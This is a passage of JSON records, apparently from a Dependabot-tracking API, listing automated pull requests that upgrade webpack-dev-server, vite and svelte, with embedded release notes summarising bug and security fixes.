href=\"https://redirect.github.com/vitejs/vite/issues/19704\"\u003e#19704\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.9 (2025-01-21)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: \u003ccode\u003epreview.allowedHosts\u003c/code\u003e with specific values was not respected (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19246\"\u003e#19246\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/0bc52e0\"\u003e0bc52e0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19246\"\u003e#19246\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: allow CORS from loopback addresses by default (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19249\"\u003e#19249\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/8f63cd6\"\u003e8f63cd6\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19249\"\u003e#19249\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.8 (2025-01-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: try parse \u003ccode\u003eserver.origin\u003c/code\u003e URL (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19241\"\u003e#19241\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/3680bad\"\u003e3680bad\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19241\"\u003e#19241\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003c!-- raw HTML omitted --\u003e4.5.7 (2025-01-20)\u003c!-- raw HTML omitted --\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: \u003ccode\u003ecrypto.getRandomValues\u003c/code\u003e is not available in old Node versions (\u003ca href=\"https://github.com/vitejs/vite/tree/HEAD/packages/vite/issues/19237\"\u003e#19237\u003c/a\u003e) (\u003ca href=\"https://github.com/vitejs/vite/commit/f4d3c46\"\u003ef4d3c46\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/vitejs/vite/issues/19237\"\u003e#19237\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cl...\n\n_Description has been truncated_","html_url":"https://github.com/AnnaProDev/fork-commit-merge/pull/47","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/AnnaProDev%2Ffork-commit-merge/issues/47","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/47/packages"}},{"old_version":"4.7.4","new_version":"5.2.4","update_type":"major","path":null,"pr_created_at":"2026-05-29T07:42:53.000Z","version_change":"4.7.4 → 5.2.4","issue":{"uuid":"4546668779","node_id":"PR_kwDOFTvqyc7gjSmp","number":3771,"state":"closed","title":"build(deps-dev): bump webpack-dev-server from 4.7.4 to 5.2.4","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-05-29T08:42:54.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T07:42:53.000Z","updated_at":"2026-05-29T08:43:04.000Z","time_to_close":3601,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps-dev)","packages":[{"name":"webpack-dev-server","old_version":"4.7.4","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"}],"path":null,"ecosystem":"npm"},"body":"Bumps [webpack-dev-server](https://github.com/webpack/webpack-dev-server) from 4.7.4 to 5.2.4.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.0...v6.0.0\"\u003e5.2.1\u003c/a\u003e (2025-03-26)\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ecross-origin requests are not allowed unless allowed by \u003ccode\u003eAccess-Control-Allow-Origin\u003c/code\u003e header\u003c/li\u003e\n\u003cli\u003erequests with an IP addresses in the \u003ccode\u003eOrigin\u003c/code\u003e header are not allowed to connect to WebSocket server unless configured by \u003ccode\u003eallowedHosts\u003c/code\u003e or it different from the \u003ccode\u003eHost\u003c/code\u003e header\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThe above changes may make the dev server not work if you relied on such behavior, but unfortunately they carry security risks, so they were considered as fixes.\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eprevent overlay for errors caught by React error boundaries (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5431\"\u003e#5431\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/8c1abc903ab444d9ce99e567b9a6c603e1ec06be\"\u003e8c1abc9\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003etake the first network found instead of the last one, this restores the same behavior as 5.0.4 (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5411\"\u003e#5411\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ffd0b86b790d372f90e17aea92cfd9def83fee96\"\u003effd0b86\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.1.0...v5.2.0\"\u003e5.2.0\u003c/a\u003e (2024-12-11)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadded \u003ccode\u003egetClientEntry\u003c/code\u003e and \u003ccode\u003egetClientHotEntry\u003c/code\u003e methods to get clients entries (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/dc642a832d45c23c5c7a08fbf29995e0db7e0d95\"\u003edc642a8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.7.4...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=webpack-dev-server\u0026package-manager=npm_and_yarn\u0026previous-version=4.7.4\u0026new-version=5.2.4)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/RabbyHub/Rabby/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/RabbyHub/Rabby/pull/3771","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/RabbyHub%2FRabby/issues/3771","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/3771/packages"}},{"old_version":"4.15.2","new_version":"5.2.4","update_type":"major","path":null,"pr_created_at":"2026-05-29T05:51:19.000Z","version_change":"4.15.2 → 5.2.4","issue":{"uuid":"4546042985","node_id":"PR_kwDOOCmB4s7ghOqh","number":31,"state":"closed","title":"Bump the npm_and_yarn group across 68 directories with 4 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-30T06:03:23.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T05:51:19.000Z","updated_at":"2026-05-30T06:03:25.000Z","time_to_close":87124,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":4,"packages":[{"name":"svelte","old_version":"4.2.20","new_version":"5.55.10","repository_url":"https://github.com/sveltejs/svelte"},{"name":"webpack-dev-server","old_version":"4.15.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"svelte","old_version":"4.2.20","new_version":"5.55.10","repository_url":"https://github.com/sveltejs/svelte"},{"name":"webpack-dev-server","old_version":"4.15.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"svelte","old_version":"4.2.20","new_version":"5.55.10","repository_url":"https://github.com/sveltejs/svelte"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 2 updates in the /desktop directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 2 updates in the /dev/prod directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/highlight directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /packages/kanban directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /packages/panel directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 2 updates in the /packages/presentation directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 1 update in the /packages/theme directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /packages/ui directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/activity-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/ai-bot-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/analytics-collector-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/attachment-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 2 updates in the /plugins/bitrix-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) and [qs](https://github.com/ljharb/qs).\nBumps the npm_and_yarn group with 1 update in the /plugins/board-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/calendar-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/card-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/chunter-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/contact-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/controlled-documents-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/desktop-preferences-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/devmodel-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/diffview-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/document-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/drive-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/gmail-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/guest-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/hr-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/image-cropper-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/inventory-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/lead-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/login-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/love-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/mail-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/my-space-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/notification-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/onboard-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/presence-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/print-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the /plugins/products-resources directory: [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte).\nBumps the npm_and_yarn group with 1 update in the 